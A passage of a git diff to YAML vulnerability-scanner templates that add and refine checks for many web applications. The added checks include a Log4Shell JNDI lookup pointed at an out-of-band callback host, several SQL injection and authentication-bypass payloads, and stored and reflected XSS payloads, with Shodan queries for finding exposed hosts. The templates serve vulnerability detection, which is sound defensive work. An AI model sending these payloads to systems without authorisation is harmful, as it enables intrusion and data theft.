index c17f20c71a..18b89426f1 100644
--- a/vulnerabilities/other/viewlinc-crlf-injection.yaml
+++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml
@@ -1,10 +1,10 @@
 id: viewlinc-crlf-injection
 
 info:
-  name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
+  name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack
   author: geeknik
   severity: low
-  description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
+  description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.
   reference:
     - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
   tags: crlf,viewlinc
@@ -29,3 +29,5 @@ requests:
           - "Set-Cookie: crlfinjection=crlfinjection"
         part: header
         condition: and
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
new file mode 100644
index 0000000000..d9b71fcb97
--- /dev/null
+++ b/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
@@ -0,0 +1,48 @@
+id: vmware-siterecovery-log4j-rce
+
+info:
+  name: VMware Site Recovery Manager - Log4j Remote Code Execution
+  author: akincibor
+  severity: critical
+  description: |
+    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Site Recovery Manager.
+  reference:
+    - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    shodan-query: title:"VMware Site Recovery Manager"
+  tags: cve,cve2021,jndi,log4j,rce,oast,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index 1dcb73f600..8c12e1c61f 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -7,7 +7,7 @@ info:
   description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
   reference:
     - https://www.exploit-db.com/exploits/48877
-  tags: auth-bypass
+  tags: auth-bypass,edb
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/vulnerabilities/other/watchguard-credentials-disclosure.yaml
index acbdf45a0a..5f12961cfe 100644
--- a/vulnerabilities/other/watchguard-credentials-disclosure.yaml
+++ b/vulnerabilities/other/watchguard-credentials-disclosure.yaml
@@ -4,12 +4,15 @@ info:
   name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
   author: gy741
   severity: critical
-  description: A credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory
-    credentials for a Windows domain in plaintext.
+  description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
   reference:
     - https://www.exploit-db.com/exploits/48203
     - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
-  tags: watchguard,disclosure
+  classification:
+    cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-288
+  tags: watchguard,disclosure,edb
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml
index 57b71c0d34..116857b0ef 100644
--- a/vulnerabilities/other/webui-rce.yaml
+++ b/vulnerabilities/other/webui-rce.yaml
@@ -1,13 +1,17 @@
 id: webui-rce
 
 info:
-  name: WebUI 1.5b6 RCE
+  name: WebUI 1.5b6 - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
+  description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
   reference:
     - https://www.exploit-db.com/exploits/36821
-  tags: webui,rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: webui,rce,edb
 
 requests:
   - method: GET
@@ -23,4 +27,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/weiphp-sql-injection.yaml b/vulnerabilities/other/weiphp-sql-injection.yaml
new file mode 100644
index 0000000000..2bc2a7db7b
--- /dev/null
+++ b/vulnerabilities/other/weiphp-sql-injection.yaml
@@ -0,0 +1,28 @@
+id: weiphp-sql-injection
+
+info:
+  name: WeiPHP 5.0 SQLI
+  author: pikpikcu
+  severity: high
+  reference:
+    - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
+  metadata:
+    verified: true
+    shodan-query: http.html:"WeiPHP5.0"
+  tags: weiphp,sql
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "52c69e3a57331081823331c4e69d3f2"
+
+      - type: status
+        status:
+          - 500
diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml
index 951a568d3d..de8358ea18 100644
--- a/vulnerabilities/other/wems-manager-xss.yaml
+++ b/vulnerabilities/other/wems-manager-xss.yaml
@@ -8,7 +8,7 @@ info:
     'email' parameter.
   reference:
     - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
-  tags: xss
+  tags: xss,packetstorm
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml
index 2fea61f35d..c2ac9bb32e 100644
--- a/vulnerabilities/other/wuzhicms-sqli.yaml
+++ b/vulnerabilities/other/wuzhicms-sqli.yaml
@@ -8,18 +8,21 @@ info:
     - https://github.com/wuzhicms/wuzhicms/issues/184
   tags: wuzhicms,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20"
+      - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20"
+
     matchers-condition: and
     matchers:
+      - type: word
+        words:
+          - '{{md5({{num}})}}'
+        part: body
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "81dc9bdb52d04dc20036dbd8313ed05"
-          - "sql_error:MySQL Query Error"
-        part: body
-        condition: and
diff --git a/vulnerabilities/other/xdcms-sqli.yaml b/vulnerabilities/other/xdcms-sqli.yaml
index aff7f9d904..d2b077214b 100644
--- a/vulnerabilities/other/xdcms-sqli.yaml
+++ b/vulnerabilities/other/xdcms-sqli.yaml
@@ -8,6 +8,9 @@ info:
     - https://www.uedbox.com/post/35188/
   tags: sqli,xdcms
 
+variables:
+  num: "999999999"
+
 requests:
   - method: POST
     path:
@@ -15,7 +18,7 @@ requests:
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
+      username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+
 
     matchers-condition: and
     matchers:
@@ -27,10 +30,8 @@ requests:
 
       - type: word
         words:
-          - "707564257851522176"
-          - "XPATH syntax error:"
+          - '{{md5({{num}})}}'
         part: body
-        condition: and
 
       - type: status
         status:
diff --git a/vulnerabilities/other/xerox-efi-lfi.yaml b/vulnerabilities/other/xerox-efi-lfi.yaml
index 3bed6e8b43..234388020b 100644
--- a/vulnerabilities/other/xerox-efi-lfi.yaml
+++ b/vulnerabilities/other/xerox-efi-lfi.yaml
@@ -1,16 +1,19 @@
 id: xerox-efi-lfi
 
 info:
-  name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
+  name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
   author: gy741
   severity: high
-  description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary
-    files on the affected system.
+  description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
   reference:
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
     - https://packetstormsecurity.com/files/145570
     - https://www.exploit-db.com/exploits/43398/
-  tags: iot,xerox,disclosure,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: iot,xerox,disclosure,lfi,packetstorm,edb
 
 requests:
   - method: GET
@@ -26,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml
index 0078f2b883..c692a17842 100644
--- a/vulnerabilities/other/yapi-rce.yaml
+++ b/vulnerabilities/other/yapi-rce.yaml
@@ -1,15 +1,19 @@
 id: yapi-rce
 
 info:
-  name: Yapi Remote Code Execution
+  name: Yapi - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
+  description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
   reference:
     - https://www.secpulse.com/archives/162502.html
     - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
     - https://twitter.com/sec715/status/1415484190561161216
     - https://github.com/YMFE/yapi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: yapi,rce
 
 requests:
@@ -19,7 +23,7 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/json;charset=UTF-8
 
-        {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
+        {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"}
 
       - | # REQUEST 2
         GET /api/group/list HTTP/1.1
@@ -91,3 +95,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/yeswiki-sql.yaml b/vulnerabilities/other/yeswiki-sql.yaml
new file mode 100644
index 0000000000..5a438d3856
--- /dev/null
+++ b/vulnerabilities/other/yeswiki-sql.yaml
@@ -0,0 +1,33 @@
+id: yeswiki-sql
+
+info:
+  name: YesWiki - SQL Injection
+  author: arafatansari
+  severity: critical
+  description: |
+    YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL.
+  reference:
+    - https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,sqli,huntr
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'c8c605999f3d8352d7bb792cf3f'
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/yeswiki-stored-xss.yaml b/vulnerabilities/other/yeswiki-stored-xss.yaml
new file mode 100644
index 0000000000..12ecd2ed31
--- /dev/null
+++ b/vulnerabilities/other/yeswiki-stored-xss.yaml
@@ -0,0 +1,65 @@
+id: yeswiki-stored-xss
+
+info:
+  name: YesWiki - Stored Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    YesWiki is vulnerable to Stored XSS via bf_text field when add a new entry for Forum.
+  reference:
+    - https://huntr.dev/bounties/5f27a9b1-c092-47e2-8092-a81298a4b932/
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,xss,stored,huntr
+
+requests:
+  - raw:
+      - |
+        POST /?BazaR&vue=saisir&action=saisir_fiche&id=2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT8dS2PT0WtxACLyu
+
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="bf_titre"
+
+        blog
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="bf_text"
+
+        "><img src=x onerror=console.log(123);>
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="file"; filename=""
+        Content-Type: application/octet-stream
+
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="bf_description"
+
+        abcd
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="fichierbf_file"; filename=""
+        Content-Type: application/octet-stream
+
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="antispam"
+
+        1
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu
+        Content-Disposition: form-data; name="id_typeannonce"
+
+        2
+        ------WebKitFormBoundaryT8dS2PT0WtxACLyu--
+
+      - |
+        GET /?BazaR&vue=consulter HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_2, 'text/html') && contains(all_headers_2, 'YesWiki')"
+          - "status_code_2 == 200"
+          - contains(body_2, '><img src=x onerror=console.log(123);>')
+        condition: and
diff --git a/vulnerabilities/other/yeswiki-xss.yaml b/vulnerabilities/other/yeswiki-xss.yaml
new file mode 100644
index 0000000000..a46b0a9f68
--- /dev/null
+++ b/vulnerabilities/other/yeswiki-xss.yaml
@@ -0,0 +1,37 @@
+id: yeswiki-xss
+
+info:
+  name: yeswiki/yeswiki - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    YesWiki before 2022-07-07 allows Reflected Cross-site Scripting via the "id" parameter in the AccueiL URL.
+  reference:
+    - https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
+  metadata:
+    verified: true
+    shodan-query: http.html:"yeswiki"
+  tags: yeswiki,unauth,huntr,cve,cve2022,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "Query failed:"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/yishaadmin-lfi.yaml b/vulnerabilities/other/yishaadmin-lfi.yaml
index 3d516701fa..13bfe758b8 100644
--- a/vulnerabilities/other/yishaadmin-lfi.yaml
+++ b/vulnerabilities/other/yishaadmin-lfi.yaml
@@ -1,14 +1,18 @@
 id: yishaadmin-lfi
 
 info:
-  name: yishaadmin path traversal
+  name: yishaadmin - Local File Inclusion
   author: Evan Rubinstein
   severity: high
-  description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.
+  description: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication.
   reference:
     - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
     - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186
-  tags: lfi,yishaadmin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,yishaadmin,huntr
 
 requests:
   - raw:
@@ -25,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml
index 61c4b5440d..b6d7eb9e14 100644
--- a/vulnerabilities/other/zcms-v3-sqli.yaml
+++ b/vulnerabilities/other/zcms-v3-sqli.yaml
@@ -8,16 +8,21 @@ info:
     - https://www.anquanke.com/post/id/183241
   tags: zcms,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
+      - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
+
     matchers-condition: and
     matchers:
+      - type: word
+        words:
+          - '{{md5({{num}})}}'
+        part: body
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "6f7c6dcbc380aac3bcba1f9fccec991e"
-        part: body
diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml
index cb99a3ac7a..6beb74e792 100644
--- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml
+++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml
@@ -1,12 +1,19 @@
 id: zimbra-preauth-ssrf
 
 info:
-  name: Zimbra Collaboration Suite (ZCS) - SSRF
+  name: Zimbra Collaboration Suite - Server-Side Request Forgery
   author: gy741
   severity: critical
-  description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
+  description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
   reference:
     - https://www.adminxe.com/2183.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
+    - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-7796
+    cwe-id: CWE-918
   tags: zimbra,ssrf,oast
 
 requests:
@@ -21,3 +28,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
index 86b727fd15..15b5b8aa2d 100644
--- a/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/vulnerabilities/other/zms-auth-bypass.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/48880
-  tags: auth-bypass,zms
+  tags: zms,edb,auth-bypass
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/zms-sqli.yaml b/vulnerabilities/other/zms-sqli.yaml
new file mode 100644
index 0000000000..43aed3d585
--- /dev/null
+++ b/vulnerabilities/other/zms-sqli.yaml
@@ -0,0 +1,38 @@
+id: zms-sqli
+
+info:
+  name: Zoo Management System (ZMS) 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Zoo Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48880
+  metadata:
+    verified: true
+  tags: zms,sqli,auth-bypass,cms,edb
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin%27+or+%271%27%3D%271&password=any&login=
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ZMS ADMIN'
+          - 'Dashboard'
+          - 'Zoo Management System'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml
new file mode 100644
index 0000000000..c6ae32d33b
--- /dev/null
+++ b/vulnerabilities/other/zzcms-xss.yaml
@@ -0,0 +1,34 @@
+id: zzcms-xss
+
+info:
+  name: ZZCMS - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  reference:
+    - https://github.com/JcQSteven/blog/issues/20
+  metadata:
+    verified: true
+  tags: zzcms,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /admin/logincheck.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        admin={{username}}&pass={{password}}
+
+      - |
+        GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_2, 'text/html')"
+          - "status_code_2 == 200"
+          - 'contains(body_2, "参数 1\"+alert(document.domain)+")'
+        condition: and
diff --git a/vulnerabilities/rails/rails6-xss.yaml b/vulnerabilities/rails/rails6-xss.yaml
index 6bc1c7b911..b82d75b3a2 100644
--- a/vulnerabilities/rails/rails6-xss.yaml
+++ b/vulnerabilities/rails/rails6-xss.yaml
@@ -12,7 +12,7 @@ info:
   severity: medium
   reference:
     - https://hackerone.com/reports/904059
-  tags: rails,xss,crlf
+  tags: rails,xss,crlf,hackerone
 
 requests:
   - method: POST
diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml
index 5ec32d7a37..3a44f3825f 100644
--- a/vulnerabilities/rocketchat/unauth-message-read.yaml
+++ b/vulnerabilities/rocketchat/unauth-message-read.yaml
@@ -1,12 +1,18 @@
 id: rocketchat-unauth-access
 
 info:
-  name: RocketChat Unauthenticated Read Access
+  name: RocketChat Live Chat - Unauthenticated Read Access
   author: rojanrijal
-  severity: critical
-  description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens.
+  severity: high
+  description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens.
   reference:
     - https://docs.rocket.chat/guides/security/security-updates
+    - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-522
+  remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8.
   tags: rocketchat,unauth
 
 requests:
@@ -30,12 +36,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: body
         words:
           - '"{\"msg\":\"result\",\"result\":{\"messages\"'
           - '"success":true'
-        part: body
         condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/03
\ No newline at end of file
diff --git a/vulnerabilities/royalevent/royalevent-management-xss.yaml b/vulnerabilities/royalevent/royalevent-management-xss.yaml
new file mode 100644
index 0000000000..5a17561fa5
--- /dev/null
+++ b/vulnerabilities/royalevent/royalevent-management-xss.yaml
@@ -0,0 +1,72 @@
+id: royalevent-management-xss
+
+info:
+  name: Royal Event - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Detects an XSS vulnerability in Royal Event System
+  reference:
+    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+  metadata:
+    verified: true
+  tags: xss,authenticated,cms,royalevent
+
+requests:
+  - raw:
+      - |
+        POST /royal_event/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 353
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
+
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="username"
+
+        {{username}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="password"
+
+        {{password}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="login"
+
+
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD--
+
+      - |
+        POST /royal_event/btndates_report.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
+
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="todate"
+
+        2022-12-22<script>alert(document.domain)</script>
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="search"
+
+        3
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="fromdate"
+
+        2022-06-22<script>alert(document.domain)</script>
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD--
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "Report from "
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/vulnerabilities/royalevent/royalevent-stored-xss.yaml
new file mode 100644
index 0000000000..2878bfff38
--- /dev/null
+++ b/vulnerabilities/royalevent/royalevent-stored-xss.yaml
@@ -0,0 +1,32 @@
+id: royalevent-stored-xss
+
+info:
+  name: Royale Event - Stored Cross-Site Scripting
+  author: ritikchaddha
+  severity: high
+  description: |
+    Detects an XSS vulnerability in Royal Event System
+  reference:
+    - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
+    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+  metadata:
+    verified: true
+  tags: xss,unauthenticated,cms,royalevent,packetstorm
+
+requests:
+  - raw:
+      - |
+        POST /royal_event/companyprofile.php HTTP/1.1
+        Host: {{Hostname}}
+
+        companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&regno=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'value="><script>alert(document.domain)</script>" >'
+
+      - type: status
+        status:
+          - 302
diff --git a/vulnerabilities/ruijie/ruijie-eg-rce.yaml b/vulnerabilities/ruijie/ruijie-eg-rce.yaml
index 236a2e9889..af8c7d83ad 100644
--- a/vulnerabilities/ruijie/ruijie-eg-rce.yaml
+++ b/vulnerabilities/ruijie/ruijie-eg-rce.yaml
@@ -1,14 +1,17 @@
 id: ruijie-eg-rce
 
 info:
-  name: Ruijie EG cli.php RCE
+  name: Ruijie EG - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin'
-    privileges due to a vulnerability in the login screen.
+  description: Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
   reference:
